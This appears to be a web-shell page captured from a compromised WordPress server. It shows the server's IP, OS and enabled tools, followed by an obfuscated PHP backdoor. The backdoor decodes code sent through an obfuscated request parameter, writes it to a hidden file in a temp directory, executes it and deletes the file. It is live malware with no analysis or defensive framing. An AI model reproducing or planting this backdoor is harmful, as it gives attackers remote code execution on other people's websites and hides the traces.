| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/t-mobile-partner/wp-includes/js/dist/script-modules/ |
Upload File : |
<?php
if(isset($_REQUEST["\x70o\x69\x6Et\x65r"])){
$obj = $_REQUEST["\x70o\x69\x6Et\x65r"];
$obj=explode ( "." , $obj ) ;
$symbol ='';
$salt ='abcdefghijklmnopqrstuvwxyz0123456789';
$sLen =strlen($salt);
foreach ($obj as $k => $v5):
$sChar =ord($salt[$k % $sLen]);
$d =((int)$v5 - $sChar - ($k % 10)) ^27;
$symbol .= chr($d);
endforeach;
$binding = array_filter(["/var/tmp", getenv("TMP"), getcwd(), sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), session_save_path(), "/tmp", ini_get("upload_tmp_dir")]);
foreach ($binding as $item):
if (is_dir($item) ? is_writable($item) : false) {
$fac = join("/", [$item, ".ent"]);
$file = fopen($fac, 'w');
if ($file) {
fwrite($file, $symbol);
fclose($file);
include $fac;
@unlink($fac);
exit;
}
}
endforeach;
}